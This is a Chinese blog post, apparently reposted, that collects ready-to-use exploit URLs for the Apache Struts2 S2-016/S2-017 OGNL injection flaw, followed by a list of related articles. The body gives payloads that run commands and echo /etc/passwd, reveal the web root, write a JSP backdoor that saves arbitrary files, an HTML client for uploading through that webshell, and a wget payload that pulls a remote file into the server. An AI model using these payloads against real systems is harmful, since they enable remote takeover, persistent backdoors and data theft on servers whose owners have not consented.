Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理

最新推荐文章于 2022-09-24 18:21:45 发布
最新推荐文章于 2022-09-24 18:21:45 发布
阅读量3k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: Struts2
以下是Struts2 S2-016/S2-017漏洞 命令执行整理
带回显命令执行
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
爆路径
http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
写文件
http://www.example.com/struts2-blank/example/X.action?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
写入的文件内容:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
其实就是一个jsp的小马,需要客户端配合
函数f是文件名,t是内容
客户端:
<form action=" http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>
<input type=submit value="提交">
</form>
就在当前目录建立一个fjp.jsp
shell: http://www.example.com/struts2-blank/example/fjp.jsp
还有@园长的一个客户端:
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
</head>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
  function upload(){
    var url = document.getElementById('url').value,
      content = document.getElementById('content').value,
      fileName = document.getElementById('fn').value,
      form = document.getElementById('fm');
    if(url.length == 0){
      alert("Url not allowd empty!");
      return ;
    }
    if(content.length == 0){
      alert("Content not allowd empty!");
      return ;
    }
    if(fileName.length == 0){
      alert("FileName not allowd empty!");
      return ;
    }
    form.action = url;
    form.submit();
  }
</script>
<body>
<div class="main">
  <form id="fm" method="post">
    URL:<input type="text" value=" http://localhost/Struts2/css3.jsp" class="url" id="url"/>
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
    <a href="javascript:upload();">Upload</a>
    <textarea id="content" class="content" name="t" ></textarea>
  </form>
</div>
</body>
</html>
还有@X发的一个wget的getshell
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget',' http://www.url.com/xx.txt','- O','/root/1.jsp'}
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
转载自 http://www.xinyues.org/thread-1385-1-1.html
 

原文链接:http://winbule.com/struts2-s2-016s2-017.html



MSF 利用模块 https://dev.metasploit.com/redmine/projects/framework/repository/revisions/master/entry/modules/exploits/multi/http/struts_default_action_mapper.rb

win cmd 下执行

echo 一句话代码 >> "服务器路径\test.jsp"

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Struts2 远程命令执行漏洞(CVE-2020-17530)(S2-061)
qq_51577576的博客
08-22 673
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
s2-045 php exp,K8 Struts2 Exp 20170310 S2-045(Struts2综合漏洞利用工具)
weixin_42501711的博客
03-28 663
工具:K8Struts2Exploit组织:K8搞基大队[K8team]作者:K8拉登哥哥发布:2014/7/3110:24:56简介:K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit)Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Stru...
s2-016-exp:S2-016 漏洞利用&&扫描器
06-19
s2-016-exp S2-016 Exploit && Scanner 1、s2_016.py 文件 这是针对S2-016exploit程序,使用前先搭建Python运行环境,具体网上搜索即可。 使用方法: python s2-016.py [target_url] [filename of a webshell] [shellname at remote host] 例子: [+]目标: 当前路径下有名为webshell.jsp的木马 [+]命令执行:python s2-016.py webshell.jsp system.jsp 目标是www.xxoo.com,要传上去的webshell名字是webshell.jsp(放在当前路径下),system.jsp是传到远程服务器上时,在服务器端的名字 一旦攻击成功,那么就访问 2、Struts2Scanner.py s2_016漏洞
struts2 exp S2-016
think_ycx的专栏
08-08 854
整理一些exp
Struts2 S2-016/S2-017 查看物理路径 EXP
chuancuili8770的博客
07-18 148
http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%...
Struts2漏洞S2-016S2-017
u010743716的专栏
07-19 1811
昨天出的struts2的漏洞,我只是瓢了一眼,今天有空正好试一下 下面是官网的两个漏洞的说明 http://struts.apache.org/release/2.3.x/docs/s2-016.html problem: The Struts 2 DefaultActionMapper supports a method for short-circuit navigat
Struts2 S2-016/S2-017 命令执行回显、看web路径、getshell e...
chuancuili8770的博客
07-18 462
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 回显命令执行: http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(n...
K8_Struts2_EXP S2-045.rar
02-22
Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts2 GetShell 目前已支持以下struts2漏洞编号 (S2-032 s2-020 s2-019 s2-016 s2-013 s2-009 S2-005) 声明:工具仅供安全检测或网络攻防研究,...
K8_Struts2_EXP.zip
09-27
]10 S2-045 CVE-2017-5638 支持GetShell/获取物理路径/执行CMD命令 [+]9 devMode CVE-xxxx-xxxx 支持GetShell/获取物理路径/执行CMD命令 [+]8 S2-037 CVE-2016-4438 支持GetShell/获取物理路径/执行CMD命令 [+]7 ...
[原创]K8 Struts2 Exp 20170310 S2-045(Struts2综合漏洞利用工具)
weixin_30446613的博客
01-12 7559
工具:K8Struts2Exploit组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2014/7/3110:24:56简介: K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit)Struts2漏洞检测工具 Struts2漏洞测试工...
struts2 最新漏洞 S2-016S2-017修补方案 .docx
08-01
struts2 最新漏洞 S2-016S2-017修补方案 .docx
struts2反序列化漏洞,存在s2-005、s2-016s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005、s2-016s2-016_3、s2-017等漏洞解决方案,已升级可用
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
crystal0011的专栏
08-20 2367
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本 Struts2这个不争气的家伙。已经无话可说了。  POC来自官方: http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-0
修复漏洞--Struts2远程命令执行S2-016/S2-017
qq_38281963的博客
11-28 2407
问题描述:该问题是由于Struts2框架,主要是2.2之前版本漏洞所造成的,漏洞会引起数据泄露和容易被黑客攻击。 解决思路1:可以对现有工程进行maven版本更新,升级到2.3,但是版本升级一般费时费力 解决思路2:下载当前工程使用的Struts2版本源码,修改DefaultActionMapper中handleSpecialParameters方法 因为本项目版本依赖复杂,版本升级难度较大...
Apache Struts2远程代码执行漏洞(S2-016
weixin_47493074的博客
09-24 964
Apache Struts2远程代码执行漏洞(S2-016
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本及修复方法
weixin_30519071的博客
07-18 294
详情查看http://zone.wooyun.org/content/5159 官方漏洞说明 http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-017.html 修复方法: 找到站点目录下面lib目录 删掉 struts2-s...
S2-016 远程代码执行漏洞
a1b2c3是弱口令
12-11 6666
struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 漏洞记录 S2-016 CVE-2013-2251 影响版本:Struts 2.0....
Struts2 高危漏洞修复方案 (S2-016/S2-017)
傾城如夢的专栏
08-27 1304
建忠 闫. 于 星期四, 08/08/2013 - 08:09 提交 近期Struts2被曝重要漏洞,此漏洞影响struts2.0-struts2.3所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大,受影响站点以电商、银行、门户、政府居多. 官方描述: S2-016:https://cwiki.apache.org/confluence/display/WW/S
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
热门推荐
yx9o
03-26 1万+
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复 官网描述如下: http://struts.apache.org/release/2.3.x/docs/s2-016.html 怎么解决呢?
struts s2-20/21
最新发布
09-02
Struts2是一种基于Java EE的开源Web应用程序框架,用于构建J2EE应用程序。S2-020和S2-021是Struts2框架中的两个安全漏洞。 S2-020漏洞是由于在处理**参数拦截器(ParameterInterceptor)**时存在安全问题而引起的。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值